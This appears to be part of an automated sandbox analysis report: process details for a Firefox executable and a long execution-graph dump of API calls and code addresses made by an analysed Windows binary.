                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:4%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:6.1%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:84
97490 e07c8e 59 API calls 97489->97490 97491 e641a4 97490->97491 97814 e64264 59 API calls 97491->97814 97493 e641b3 97815 e64264 59 API calls 97493->97815 97495 e641c6 97496 e07b52 59 API calls 97495->97496 97497 e641d0 97496->97497 97498 e641e7 97497->97498 97499 e641d5 97497->97499 97501 e07b52 59 API calls 97498->97501 97500 e07e0b 59 API calls 97499->97500 97502 e641e2 97500->97502 97503 e641f0 97501->97503 97505 e07c8e 59 API calls 97502->97505 97504 e6420e 97503->97504 97507 e07e0b 59 API calls 97503->97507 97506 e07c8e 59 API calls 97504->97506 97505->97504 97506->97508 97507->97502 97508->97176 97510 e6920b __ftell_nolock 97509->97510 97511 e20f36 Mailbox 59 API calls 97510->97511 97512 e69268 97511->97512 97513 e0538e 59 API calls 97512->97513 97514 e69272 97513->97514 97515 e69008 GetSystemTimeAsFileTime 97514->97515 97516 e6927d 97515->97516 97517 e05045 85 API calls 97516->97517 97518 e69290 _wcscmp 97517->97518 97519 e692b4 97518->97519 97520 e69361 97518->97520 97846 e697dd 97519->97846 97522 e697dd 96 API calls 97520->97522 97537 e6932d _wcscat 97522->97537 97525 e0506b 74 API calls 97527 e69386 97525->97527 97526 e6936a 97526->97182 97528 e0506b 74 API calls 97527->97528 97530 e69396 97528->97530 97529 e692e2 _wcscat _wcscpy 97853 e2426e 58 API calls __wsplitpath_helper 97529->97853 97531 e0506b 74 API calls 97530->97531 97533 e693b1 97531->97533 97534 e0506b 74 API calls 97533->97534 97535 e693c1 97534->97535 97536 e0506b 74 API calls 97535->97536 97538 e693dc 97536->97538 97537->97525 97537->97526 97539 e0506b 74 API calls 97538->97539 97540 e693ec 97539->97540 97541 e0506b 74 API calls 97540->97541 97542 e693fc 97541->97542 97543 e0506b 74 API calls 97542->97543 97544 e6940c 97543->97544 97816 e6998c GetTempPathW GetTempFileNameW 97544->97816 97546 e69418 97547 e253cb 115 API calls 97546->97547 97558 e69429 97547->97558 97548 e694e3 97830 e25516 97548->97830 97550 e694ee 97552 e694f4 DeleteFileW 97550->97552 97553 e69508 97550->97553 97551 
e0506b 74 API calls 97551->97558 97552->97526 97554 e695ae CopyFileW 97553->97554 97559 e69512 _wcsncpy 97553->97559 97555 e695d6 DeleteFileW 97554->97555 97556 e695c4 DeleteFileW 97554->97556 97843 e6994b CreateFileW 97555->97843 97556->97526 97558->97526 97558->97548 97558->97551 97817 e249d3 97558->97817 97854 e68baf 116 API calls __fcloseall 97559->97854 97562 e69599 97562->97555 97563 e6959d DeleteFileW 97562->97563 97563->97526 97564->97109 97566 e3f0a3 97565->97566 97567 e07e1f 97565->97567 97569 e08189 59 API calls 97566->97569 98119 e07db0 97567->98119 97571 e3f0ae __wsetenvp _memmove 97569->97571 97570 e07e2a 97570->97143 97572->97145 97573->97156 97575 e07da5 97574->97575 97576 e07d38 __wsetenvp 97574->97576 97577 e07e8c 59 API calls 97575->97577 97579 e07d73 97576->97579 97580 e07d4e 97576->97580 97578 e07d56 _memmove 97577->97578 97578->97168 97582 e08189 59 API calls 97579->97582 98124 e08087 59 API calls Mailbox 97580->98124 97582->97578 97632 e04d61 97583->97632 97586 e04d53 97590 e253cb 97586->97590 97587 e04d4a FreeLibrary 97587->97586 97588 e04d61 2 API calls 97589 e04d3a 97588->97589 97589->97586 97589->97587 97636 e253e0 97590->97636 97592 e04f5c 97592->97373 97592->97374 97717 e04d94 97593->97717 97596 e04ced 97597 e04d08 97596->97597 97598 e04cff FreeLibrary 97596->97598 97600 e04dd0 97597->97600 97598->97597 97599 e04d94 2 API calls 97599->97596 97601 e20f36 Mailbox 59 API calls 97600->97601 97602 e04de5 97601->97602 97721 e0538e 97602->97721 97604 e04df1 _memmove 97605 e04e2c 97604->97605 97606 e04f21 97604->97606 97607 e04ee9 97604->97607 97608 e05027 69 API calls 97605->97608 97735 e699c4 95 API calls 97606->97735 97724 e04fe9 CreateStreamOnHGlobal 97607->97724 97616 e04e35 97608->97616 97611 e0506b 74 API calls 97611->97616 97612 e04ec9 97612->97381 97614 e3dc00 97615 e05045 85 API calls 97614->97615 97617 e3dc14 97615->97617 97616->97611 97616->97612 97616->97614 97730 e05045 97616->97730 97618 e0506b 74 API calls 97617->97618 
97618->97612 97620 e3dd26 97619->97620 97621 e0507d 97619->97621 97759 e25752 97621->97759 97624 e691b2 97779 e69008 97624->97779 97626 e691c8 97626->97389 97628 e05036 97627->97628 97630 e3dce9 97627->97630 97784 e25dd0 97628->97784 97631 e0503e 97633 e04d2e 97632->97633 97634 e04d6a LoadLibraryA 97632->97634 97633->97588 97633->97589 97634->97633 97635 e04d7b GetProcAddress 97634->97635 97635->97633 97638 e253ec __setmode 97636->97638 97637 e253ff 97685 e28ca8 58 API calls __getptd_noexit 97637->97685 97638->97637 97640 e25430 97638->97640 97655 e30668 97640->97655 97641 e25404 97686 e28f36 9 API calls _W_expandtime 97641->97686 97644 e25435 97645 e2544b 97644->97645 97646 e2543e 97644->97646 97648 e25475 97645->97648 97649 e25455 97645->97649 97687 e28ca8 58 API calls __getptd_noexit 97646->97687 97670 e30787 97648->97670 97688 e28ca8 58 API calls __getptd_noexit 97649->97688 97654 e2540f @_EH4_CallFilterFunc@8 __setmode 97654->97592 97656 e30674 __setmode 97655->97656 97657 e29d8b __lock 58 API calls 97656->97657 97667 e30682 97657->97667 97658 e306fd 97695 e2899d 58 API calls 2 library calls 97658->97695 97659 e306f6 97690 e3077e 97659->97690 97662 e30773 __setmode 97662->97644 97663 e30704 97663->97659 97696 e29fab InitializeCriticalSectionAndSpinCount 97663->97696 97666 e29e13 __mtinitlocknum 58 API calls 97666->97667 97667->97658 97667->97659 97667->97666 97693 e26dcd 59 API calls __lock 97667->97693 97694 e26e37 LeaveCriticalSection LeaveCriticalSection _doexit 97667->97694 97668 e3072a EnterCriticalSection 97668->97659 97678 e307a7 __wopenfile 97670->97678 97671 e307c1 97701 e28ca8 58 API calls __getptd_noexit 97671->97701 97673 e307c6 97702 e28f36 9 API calls _W_expandtime 97673->97702 97675 e309df 97698 e38721 97675->97698 97676 e25480 97689 e254a2 LeaveCriticalSection LeaveCriticalSection _fprintf 97676->97689 97678->97671 97684 e3097c 97678->97684 97703 e2394b 60 API calls 3 library calls 97678->97703 97680 e30975 97680->97684 97704 e2394b 60 API 
calls 3 library calls 97680->97704 97682 e30994 97682->97684 97705 e2394b 60 API calls 3 library calls 97682->97705 97684->97671 97684->97675 97685->97641 97686->97654 97687->97654 97688->97654 97689->97654 97697 e29ef5 LeaveCriticalSection 97690->97697 97692 e30785 97692->97662 97693->97667 97694->97667 97695->97663 97696->97668 97697->97692 97706 e37f05 97698->97706 97700 e3873a 97700->97676 97701->97673 97702->97676 97703->97680 97704->97682 97705->97684 97707 e37f11 __setmode 97706->97707 97708 e37f27 97707->97708 97711 e37f5d 97707->97711 97709 e28ca8 __lseek_nolock 58 API calls 97708->97709 97710 e37f2c 97709->97710 97712 e28f36 _W_expandtime 9 API calls 97710->97712 97713 e37fce __wsopen_nolock 109 API calls 97711->97713 97716 e37f36 __setmode 97712->97716 97714 e37f79 97713->97714 97715 e37fa2 __wsopen_helper LeaveCriticalSection 97714->97715 97715->97716 97716->97700 97718 e04ce1 97717->97718 97719 e04d9d LoadLibraryA 97717->97719 97718->97596 97718->97599 97719->97718 97720 e04dae GetProcAddress 97719->97720 97720->97718 97722 e20f36 Mailbox 59 API calls 97721->97722 97723 e053a0 97722->97723 97723->97604 97725 e05020 97724->97725 97726 e05003 FindResourceExW 97724->97726 97725->97605 97726->97725 97727 e3dc8c LoadResource 97726->97727 97727->97725 97728 e3dca1 SizeofResource 97727->97728 97728->97725 97729 e3dcb5 LockResource 97728->97729 97729->97725 97731 e05054 97730->97731 97732 e3dd04 97730->97732 97736 e259bd 97731->97736 97734 e05062 97734->97616 97735->97605 97739 e259c9 __setmode 97736->97739 97737 e259db 97749 e28ca8 58 API calls __getptd_noexit 97737->97749 97738 e25a01 97751 e26d8e 97738->97751 97739->97737 97739->97738 97742 e259e0 97750 e28f36 9 API calls _W_expandtime 97742->97750 97746 e259eb __setmode 97746->97734 97747 e25a16 97758 e25a38 LeaveCriticalSection LeaveCriticalSection _fprintf 97747->97758 97749->97742 97750->97746 97752 e26dc0 EnterCriticalSection 97751->97752 97753 e26d9e 97751->97753 97755 e25a07 97752->97755 97753->97752 
97754 e26da6 97753->97754 97756 e29d8b __lock 58 API calls 97754->97756 97757 e2592e 83 API calls 4 library calls 97755->97757 97756->97755 97757->97747 97758->97746 97762 e2576d 97759->97762 97761 e0508e 97761->97624 97764 e25779 __setmode 97762->97764 97763 e257b4 __setmode 97763->97761 97764->97763 97765 e2578f _memset 97764->97765 97766 e257bc 97764->97766 97775 e28ca8 58 API calls __getptd_noexit 97765->97775 97767 e26d8e __lock_file 59 API calls 97766->97767 97769 e257c2 97767->97769 97777 e2558d 72 API calls 7 library calls 97769->97777 97770 e257a9 97776 e28f36 9 API calls _W_expandtime 97770->97776 97773 e257d8 97778 e257f6 LeaveCriticalSection LeaveCriticalSection _fprintf 97773->97778 97775->97770 97776->97763 97777->97773 97778->97763 97782 e2537a GetSystemTimeAsFileTime 97779->97782 97781 e69017 97781->97626 97783 e253a8 __aulldiv 97782->97783 97783->97781 97785 e25ddc __setmode 97784->97785 97786 e25e03 97785->97786 97787 e25dee 97785->97787 97789 e26d8e __lock_file 59 API calls 97786->97789 97798 e28ca8 58 API calls __getptd_noexit 97787->97798 97791 e25e09 97789->97791 97790 e25df3 97799 e28f36 9 API calls _W_expandtime 97790->97799 97800 e25a40 67 API calls 7 library calls 97791->97800 97794 e25e14 97801 e25e34 LeaveCriticalSection LeaveCriticalSection _fprintf 97794->97801 97796 e25e26 97797 e25dfe __setmode 97796->97797 97797->97631 97798->97790 97799->97797 97800->97794 97801->97796 97803 e07f06 97802->97803 97805 e07ef9 97802->97805 97804 e20f36 Mailbox 59 API calls 97803->97804 97804->97805 97805->97411 97806->97433 97808 e07bbf 97807->97808 97809 e07be5 _memmove 97807->97809 97808->97809 97810 e20f36 Mailbox 59 API calls 97808->97810 97809->97451 97811 e07c34 97810->97811 97812 e20f36 Mailbox 59 API calls 97811->97812 97812->97809 97813->97452 97814->97493 97815->97495 97816->97546 97818 e249df __setmode 97817->97818 97819 e24a15 97818->97819 97820 e249fd 97818->97820 97821 e24a0d __setmode 97818->97821 97822 e26d8e __lock_file 59 API calls 
97819->97822 97867 e28ca8 58 API calls __getptd_noexit 97820->97867 97821->97558 97824 e24a1b 97822->97824 97855 e2487a 97824->97855 97825 e24a02 97868 e28f36 9 API calls _W_expandtime 97825->97868 97831 e25522 __setmode 97830->97831 97832 e25536 97831->97832 97833 e2554e 97831->97833 98046 e28ca8 58 API calls __getptd_noexit 97832->98046 97835 e26d8e __lock_file 59 API calls 97833->97835 97840 e25546 __setmode 97833->97840 97837 e25560 97835->97837 97836 e2553b 98047 e28f36 9 API calls _W_expandtime 97836->98047 98030 e254aa 97837->98030 97840->97550 97844 e69987 97843->97844 97845 e69971 SetFileTime CloseHandle 97843->97845 97844->97526 97845->97844 97848 e697f1 __tzset_nolock _wcscmp 97846->97848 97847 e691b2 GetSystemTimeAsFileTime 97847->97848 97848->97847 97849 e0506b 74 API calls 97848->97849 97850 e692b9 97848->97850 97851 e05045 85 API calls 97848->97851 97849->97848 97850->97526 97852 e2426e 58 API calls __wsplitpath_helper 97850->97852 97851->97848 97852->97529 97853->97537 97854->97562 97858 e24889 97855->97858 97861 e248a7 97855->97861 97856 e24897 97905 e28ca8 58 API calls __getptd_noexit 97856->97905 97858->97856 97858->97861 97865 e248c1 _memmove 97858->97865 97859 e2489c 97906 e28f36 9 API calls _W_expandtime 97859->97906 97869 e24a4d LeaveCriticalSection LeaveCriticalSection _fprintf 97861->97869 97865->97861 97870 e24856 97865->97870 97877 e2da06 97865->97877 97907 e24bad 97865->97907 97913 e2af9e 78 API calls 7 library calls 97865->97913 97867->97825 97868->97821 97869->97821 97871 e24860 97870->97871 97872 e24875 97870->97872 97914 e28ca8 58 API calls __getptd_noexit 97871->97914 97872->97865 97874 e24865 97915 e28f36 9 API calls _W_expandtime 97874->97915 97878 e2da12 __setmode 97877->97878 97879 e2da36 97878->97879 97880 e2da1f 97878->97880 97882 e2dad5 97879->97882 97884 e2da4a 97879->97884 97989 e28c74 58 API calls __getptd_noexit 97880->97989 97995 e28c74 58 API calls __getptd_noexit 97882->97995 97883 e2da24 97887 e2da72 97884->97887 
97888 e2da68 97884->97888 97905->97859 97906->97861 97908 e24bc0 97907->97908 97909 e24be4 97907->97909 97908->97909 97910 e24856 __flush 58 API calls 97908->97910 97909->97865 97911 e24bdd 97910->97911 97912 e2da06 __write 78 API calls 97911->97912 97912->97909 97913->97865 97914->97874 97989->97883 98031 e254b9 98030->98031 98032 e254cd 98030->98032 98079 e28ca8 58 API calls __getptd_noexit 98031->98079 98034 e254c9 98032->98034 98036 e24bad __flush 78 API calls 98032->98036 98048 e25585 LeaveCriticalSection LeaveCriticalSection _fprintf 98034->98048 98035 e254be 98080 e28f36 9 API calls _W_expandtime 98035->98080 98038 e254d9 98036->98038 98049 e30cf7 98038->98049 98041 e24856 __flush 58 API calls 98046->97836 98047->97840 98048->97840 98050 e254e1 98049->98050 98051 e30d04 98049->98051 98050->98041 98051->98050 98052 e22ed5 _free 58 API calls 98051->98052 98052->98050 98079->98035 98080->98034 98120 e07dbf __wsetenvp 98119->98120 98121 e08189 59 API calls 98120->98121 98122 e07dd0 _memmove 98120->98122 98123 e3f060 _memmove 98121->98123 98122->97570 98124->97578 98126 e63c82 98125->98126 98127 e644b6 FindFirstFileW 98125->98127 98126->96954 98127->98126 98128 e644cb FindClose 98127->98128 98128->98126 98129->97228 98130->97200 98131->97215 98132->97210 98133->97216 98134->97226 98135->97229 98136->97233 98137->96974 98138->96972 98139->96863 98140->96863 98141->96861 98142->96862 98143->96866 98144->96862 98145->96887 98146 e01066 98151 e0f8cf 98146->98151 98148 e0106c 98149 e22ec0 __cinit 67 API calls 98148->98149 98150 e01076 98149->98150 98152 e0f8f0 98151->98152 98184 e20083 98152->98184 98156 e0f937 98157 e077c7 59 API calls 98156->98157 98158 e0f941 98157->98158 98159 e077c7 59 API calls 98158->98159 98160 e0f94b 98159->98160 98161 e077c7 59 API calls 98160->98161 98162 e0f955 98161->98162 98163 e077c7 59 API calls 98162->98163 98164 e0f993 98163->98164 98165 e077c7 59 API calls 98164->98165 98166 e0fa5e 98165->98166 98194 e160e7 98166->98194 98170 e0fa90 
98171 e077c7 59 API calls 98170->98171 98172 e0fa9a 98171->98172 98222 e1ff1e 98172->98222 98174 e0fae1 98175 e0faf1 GetStdHandle 98174->98175 98176 e44904 98175->98176 98177 e0fb3d 98175->98177 98176->98177 98179 e4490d 98176->98179 98178 e0fb45 OleInitialize 98177->98178 98178->98148 98229 e66be1 64 API calls Mailbox 98179->98229 98181 e44914 98230 e672b0 CreateThread 98181->98230 98183 e44920 CloseHandle 98183->98178 98231 e2015c 98184->98231 98187 e2015c 59 API calls 98188 e200c5 98187->98188 98189 e077c7 59 API calls 98188->98189 98190 e200d1 98189->98190 98191 e07d2c 59 API calls 98190->98191 98192 e0f8f6 98191->98192 98193 e202e2 6 API calls 98192->98193 98193->98156 98195 e077c7 59 API calls 98194->98195 98196 e160f7 98195->98196 98197 e077c7 59 API calls 98196->98197 98198 e160ff 98197->98198 98238 e15bfd 98198->98238 98201 e15bfd 59 API calls 98202 e1610f 98201->98202 98203 e077c7 59 API calls 98202->98203 98204 e1611a 98203->98204 98205 e20f36 Mailbox 59 API calls 98204->98205 98206 e0fa68 98205->98206 98207 e16259 98206->98207 98208 e16267 98207->98208 98209 e077c7 59 API calls 98208->98209 98210 e16272 98209->98210 98211 e077c7 59 API calls 98210->98211 98212 e1627d 98211->98212 98213 e077c7 59 API calls 98212->98213 98214 e16288 98213->98214 98215 e077c7 59 API calls 98214->98215 98216 e16293 98215->98216 98217 e15bfd 59 API calls 98216->98217 98218 e1629e 98217->98218 98219 e20f36 Mailbox 59 API calls 98218->98219 98220 e162a5 RegisterWindowMessageW 98219->98220 98220->98170 98223 e55ac5 98222->98223 98224 e1ff2e 98222->98224 98241 e69b90 60 API calls 98223->98241 98225 e20f36 Mailbox 59 API calls 98224->98225 98227 e1ff36 98225->98227 98227->98174 98228 e55ad0 98229->98181 98230->98183 98242 e67296 65 API calls 98230->98242 98232 e077c7 59 API calls 98231->98232 98233 e20167 98232->98233 98234 e077c7 59 API calls 98233->98234 98235 e2016f 98234->98235 98236 e077c7 59 API calls 98235->98236 98237 e200bb 98236->98237 98237->98187 98239 e077c7 59 API 
calls 98238->98239 98240 e15c05 98239->98240 98240->98201 98241->98228 98243 fe9b98 98257 fe77e8 98243->98257 98245 fe9c62 98260 fe9a88 98245->98260 98263 feac88 GetPEB 98257->98263 98259 fe7e73 98259->98245 98261 fe9a91 Sleep 98260->98261 98262 fe9a9f 98261->98262 98264 feacb2 98263->98264 98264->98259 98265 e0e70b 98268 e0d260 98265->98268 98267 e0e719 98269 e0d27d 98268->98269 98298 e0d4dd 98268->98298 98270 e42a39 98269->98270 98271 e429ea 98269->98271 98292 e0d2a4 98269->98292 98312 e7a4fb 341 API calls __cinit 98270->98312 98272 e429ed 98271->98272 98282 e42a08 98271->98282 98275 e429f9 98272->98275 98272->98292 98310 e7ab0f 341 API calls 98275->98310 98278 e22ec0 __cinit 67 API calls 98278->98292 98279 e42c0e 98279->98279 98280 e0d594 98304 e08bb2 68 API calls 98280->98304 98281 e0d6ab 98281->98267 98282->98298 98311 e7afb7 341 API calls 3 library calls 98282->98311 98286 e42b55 98316 e7a866 89 API calls 98286->98316 98287 e0d5a3 98287->98267 98290 e08620 69 API calls 98290->98292 98292->98278 98292->98280 98292->98281 98292->98286 98292->98290 98292->98298 98299 e0a000 341 API calls 98292->98299 98300 e081a7 59 API calls 98292->98300 98302 e088a0 68 API calls __cinit 98292->98302 98303 e086a2 68 API calls 98292->98303 98305 e0859a 68 API calls 98292->98305 98306 e0d0dc 341 API calls 98292->98306 98307 e09f3a 59 API calls Mailbox 98292->98307 98308 e0d060 89 API calls 98292->98308 98309 e0cedd 341 API calls 98292->98309 98313 e08bb2 68 API calls 98292->98313 98314 e09e9c 60 API calls Mailbox 98292->98314 98315 e56ae3 60 API calls 98292->98315 98298->98281 98317 e69ed4 89 API calls 4 library calls 98298->98317 98299->98292 98300->98292 98302->98292 98303->98292 98304->98287 98305->98292 98306->98292 98307->98292 98308->98292 98309->98292 98310->98281 98311->98298 98312->98292 98313->98292 98314->98292 98315->98292 98316->98298 98317->98279 98318 e444c8 98322 e5625a 98318->98322 98320 e444d3 98321 e5625a 85 API calls 98320->98321 98321->98320 98328 e56294 
98322->98328 98330 e56267 98322->98330 98323 e56296 98334 e09488 84 API calls Mailbox 98323->98334 98324 e5629b 98326 e09997 84 API calls 98324->98326 98327 e562a2 98326->98327 98329 e07c8e 59 API calls 98327->98329 98328->98320 98329->98328 98330->98323 98330->98324 98330->98328 98331 e5628e 98330->98331 98333 e09700 59 API calls _wcsstr 98331->98333 98333->98328 98334->98324 98335 e0e5ec 98338 e0ce1a 98335->98338 98337 e0e5f8 98339 e0ce32 98338->98339 98340 e0ce86 98338->98340 98339->98340 98341 e0a000 341 API calls 98339->98341 98344 e0ceaf 98340->98344 98348 e69ed4 89 API calls 4 library calls 98340->98348 98345 e0ce69 98341->98345 98343 e42915 98343->98343 98344->98337 98345->98344 98347 e09e9c 60 API calls Mailbox 98345->98347 98347->98340 98348->98343 98349 e27dd3 98350 e27ddf __setmode 98349->98350 98386 e29f88 GetStartupInfoW 98350->98386 98353 e27de4 98388 e28cfc GetProcessHeap 98353->98388 98354 e27e3c 98355 e27e47 98354->98355 98471 e27f23 58 API calls 3 library calls 98354->98471 98389 e29c66 98355->98389 98358 e27e4d 98359 e27e58 __RTC_Initialize 98358->98359 98472 e27f23 58 API calls 3 library calls 98358->98472 98410 e2d752 98359->98410 98362 e27e67 98363 e27e73 GetCommandLineW 98362->98363 98473 e27f23 58 API calls 3 library calls 98362->98473 98429 e350a3 GetEnvironmentStringsW 98363->98429 98366 e27e72 98366->98363 98369 e27e8d 98370 e27e98 98369->98370 98474 e23235 58 API calls 3 library calls 98369->98474 98439 e34ed8 98370->98439 98373 e27e9e 98374 e27ea9 98373->98374 98475 e23235 58 API calls 3 library calls 98373->98475 98453 e2326f 98374->98453 98377 e27eb1 98378 e27ebc __wwincmdln 98377->98378 98476 e23235 58 API calls 3 library calls 98377->98476 98459 e0492e 98378->98459 98381 e27ed0 98382 e27edf 98381->98382 98477 e234d8 58 API calls _doexit 98381->98477 98478 e23260 58 API calls _doexit 98382->98478 98385 e27ee4 __setmode 98387 e29f9e 98386->98387 98387->98353 98388->98354 98479 e23307 36 API calls 2 library calls 98389->98479 98391 
e29c6b 98480 e29ebc InitializeCriticalSectionAndSpinCount __alloc_osfhnd 98391->98480 98393 e29c70 98394 e29c74 98393->98394 98482 e29f0a TlsAlloc 98393->98482 98481 e29cdc 61 API calls 2 library calls 98394->98481 98397 e29c86 98397->98394 98399 e29c91 98397->98399 98398 e29c79 98398->98358 98483 e28955 98399->98483 98402 e29cd3 98491 e29cdc 61 API calls 2 library calls 98402->98491 98405 e29cb2 98405->98402 98407 e29cb8 98405->98407 98406 e29cd8 98406->98358 98490 e29bb3 58 API calls 4 library calls 98407->98490 98409 e29cc0 GetCurrentThreadId 98409->98358 98411 e2d75e __setmode 98410->98411 98412 e29d8b __lock 58 API calls 98411->98412 98413 e2d765 98412->98413 98414 e28955 __calloc_crt 58 API calls 98413->98414 98415 e2d776 98414->98415 98416 e2d7e1 GetStartupInfoW 98415->98416 98417 e2d781 @_EH4_CallFilterFunc@8 __setmode 98415->98417 98423 e2d7f6 98416->98423 98426 e2d925 98416->98426 98417->98362 98418 e2d9ed 98505 e2d9fd LeaveCriticalSection _doexit 98418->98505 98420 e28955 __calloc_crt 58 API calls 98420->98423 98421 e2d972 GetStdHandle 98421->98426 98422 e2d985 GetFileType 98422->98426 98423->98420 98424 e2d844 98423->98424 98423->98426 98425 e2d878 GetFileType 98424->98425 98424->98426 98503 e29fab InitializeCriticalSectionAndSpinCount 98424->98503 98425->98424 98426->98418 98426->98421 98426->98422 98504 e29fab InitializeCriticalSectionAndSpinCount 98426->98504 98430 e27e83 98429->98430 98431 e350b4 98429->98431 98435 e34c9b GetModuleFileNameW 98430->98435 98506 e2899d 58 API calls 2 library calls 98431->98506 98433 e350da _memmove 98434 e350f0 FreeEnvironmentStringsW 98433->98434 98434->98430 98437 e34ccf _wparse_cmdline 98435->98437 98436 e34d0f _wparse_cmdline 98436->98369 98437->98436 98507 e2899d 58 API calls 2 library calls 98437->98507 98440 e34ef1 __wsetenvp 98439->98440 98441 e34ee9 98439->98441 98442 e28955 __calloc_crt 58 API calls 98440->98442 98441->98373 98443 e34f1a __wsetenvp 98442->98443 98443->98441 98445 e28955 __calloc_crt 58 API 
calls 98443->98445 98446 e34f71 98443->98446 98447 e34f96 98443->98447 98450 e34fad 98443->98450 98508 e34787 58 API calls 2 library calls 98443->98508 98444 e22ed5 _free 58 API calls 98444->98441 98445->98443 98446->98444 98448 e22ed5 _free 58 API calls 98447->98448 98448->98441 98509 e28f46 IsProcessorFeaturePresent 98450->98509 98452 e34fb9 98452->98373 98454 e2327b __IsNonwritableInCurrentImage 98453->98454 98524 e2a651 98454->98524 98456 e23299 __initterm_e 98457 e22ec0 __cinit 67 API calls 98456->98457 98458 e232b8 _doexit __IsNonwritableInCurrentImage 98456->98458 98457->98458 98458->98377 98460 e04948 98459->98460 98470 e049e7 98459->98470 98461 e04982 IsThemeActive 98460->98461 98527 e234ec 98461->98527 98465 e049ae 98539 e04a5b SystemParametersInfoW SystemParametersInfoW 98465->98539 98467 e049ba 98540 e03b4c 98467->98540 98469 e049c2 SystemParametersInfoW 98469->98470 98470->98381 98471->98355 98472->98359 98473->98366 98477->98382 98478->98385 98479->98391 98480->98393 98481->98398 98482->98397 98485 e2895c 98483->98485 98486 e28997 98485->98486 98488 e2897a 98485->98488 98492 e35376 98485->98492 98486->98402 98489 e29f66 TlsSetValue 98486->98489 98488->98485 98488->98486 98500 e2a2b2 Sleep 98488->98500 98489->98405 98490->98409 98491->98406 98493 e35381 98492->98493 98497 e3539c 98492->98497 98494 e3538d 98493->98494 98493->98497 98501 e28ca8 58 API calls __getptd_noexit 98494->98501 98495 e353ac RtlAllocateHeap 98495->98497 98498 e35392 98495->98498 98497->98495 98497->98498 98502 e23521 DecodePointer 98497->98502 98498->98485 98500->98488 98501->98498 98502->98497 98503->98424 98504->98426 98505->98417 98506->98433 98507->98436 98508->98443 98510 e28f51 98509->98510 98515 e28dd9 98510->98515 98514 e28f6c 98514->98452 98516 e28df3 _memset __call_reportfault 98515->98516 98517 e28e13 IsDebuggerPresent 98516->98517 98523 e2a2d5 SetUnhandledExceptionFilter UnhandledExceptionFilter 98517->98523 98519 e2c776 __crtGetStringTypeA_stat 6 API calls 98520 
e28efa 98519->98520 98522 e2a2c0 GetCurrentProcess TerminateProcess 98520->98522 98521 e28ed7 __call_reportfault 98521->98519 98522->98514 98523->98521 98525 e2a654 EncodePointer 98524->98525 98525->98525 98526 e2a66e 98525->98526 98526->98456 98528 e29d8b __lock 58 API calls 98527->98528 98529 e234f7 DecodePointer EncodePointer 98528->98529 98592 e29ef5 LeaveCriticalSection 98529->98592 98531 e049a7 98532 e23554 98531->98532 98533 e23578 98532->98533 98534 e2355e 98532->98534 98533->98465 98534->98533 98593 e28ca8 58 API calls __getptd_noexit 98534->98593 98536 e23568 98594 e28f36 9 API calls _W_expandtime 98536->98594 98538 e23573 98538->98465 98539->98467 98541 e03b59 __ftell_nolock 98540->98541 98542 e077c7 59 API calls 98541->98542 98543 e03b63 GetCurrentDirectoryW 98542->98543 98595 e03778 98543->98595 98545 e03b8c IsDebuggerPresent 98546 e03b9a 98545->98546 98547 e3d3dd MessageBoxA 98545->98547 98548 e3d3f7 98546->98548 98549 e03bb7 98546->98549 98579 e03c73 98546->98579 98547->98548 98728 e07373 59 API calls Mailbox 98548->98728 98676 e073e5 98549->98676 98550 e03c7a SetCurrentDirectoryW 98554 e03c87 Mailbox 98550->98554 98554->98469 98556 e3d407 98559 e3d41d SetCurrentDirectoryW 98556->98559 98559->98554 98579->98550 98592->98531 98593->98536 98594->98538 98596 e077c7 59 API calls 98595->98596 98597 e0378e 98596->98597 98737 e03d43 98597->98737 98599 e037ac 98600 e04864 61 API calls 98599->98600 98601 e037c0 98600->98601 98602 e07f41 59 API calls 98601->98602 98603 e037cd 98602->98603 98604 e04f3d 136 API calls 98603->98604 98605 e037e6 98604->98605 98606 e3d2de 98605->98606 98607 e037ee Mailbox 98605->98607 98779 e69604 98606->98779 98611 e081a7 59 API calls 98607->98611 98610 e3d2fd 98613 e22ed5 _free 58 API calls 98610->98613 98614 e03801 98611->98614 98612 e04faa 84 API calls 98612->98610 98615 e3d30a 98613->98615 98751 e093ea 98614->98751 98617 e04faa 84 API calls 98615->98617 98619 e3d313 98617->98619 98623 e03ee2 59 API calls 98619->98623 98620 
e07f41 59 API calls 98621 e0381a 98620->98621 98622 e08620 69 API calls 98621->98622 98624 e0382c Mailbox 98622->98624 98625 e3d32e 98623->98625 98626 e07f41 59 API calls 98624->98626 98627 e03ee2 59 API calls 98625->98627 98628 e03852 98626->98628 98629 e3d34a 98627->98629 98630 e08620 69 API calls 98628->98630 98631 e04864 61 API calls 98629->98631 98633 e03861 Mailbox 98630->98633 98632 e3d36f 98631->98632 98634 e03ee2 59 API calls 98632->98634 98636 e077c7 59 API calls 98633->98636 98635 e3d37b 98634->98635 98637 e081a7 59 API calls 98635->98637 98638 e0387f 98636->98638 98639 e3d389 98637->98639 98754 e03ee2 98638->98754 98641 e03ee2 59 API calls 98639->98641 98643 e3d398 98641->98643 98649 e081a7 59 API calls 98643->98649 98645 e03899 98645->98619 98646 e038a3 98645->98646 98647 e2307d _W_store_winword 60 API calls 98646->98647 98648 e038ae 98647->98648 98648->98625 98650 e038b8 98648->98650 98651 e3d3ba 98649->98651 98652 e2307d _W_store_winword 60 API calls 98650->98652 98653 e03ee2 59 API calls 98651->98653 98654 e038c3 98652->98654 98655 e3d3c7 98653->98655 98654->98629 98656 e038cd 98654->98656 98655->98655 98657 e2307d _W_store_winword 60 API calls 98656->98657 98658 e038d8 98657->98658 98658->98643 98659 e03919 98658->98659 98661 e03ee2 59 API calls 98658->98661 98659->98643 98660 e03926 98659->98660 98662 e0942e 59 API calls 98660->98662 98663 e038fc 98661->98663 98664 e03936 98662->98664 98665 e081a7 59 API calls 98663->98665 98666 e091b0 59 API calls 98664->98666 98667 e0390a 98665->98667 98668 e03944 98666->98668 98669 e03ee2 59 API calls 98667->98669 98770 e09040 98668->98770 98669->98659 98671 e03961 98672 e093ea 59 API calls 98671->98672 98673 e09040 60 API calls 98671->98673 98674 e03ee2 59 API calls 98671->98674 98675 e039a7 Mailbox 98671->98675 98672->98671 98673->98671 98674->98671 98675->98545 98677 e073f2 __ftell_nolock 98676->98677 98678 e3ed7b _memset 98677->98678 98679 e0740b 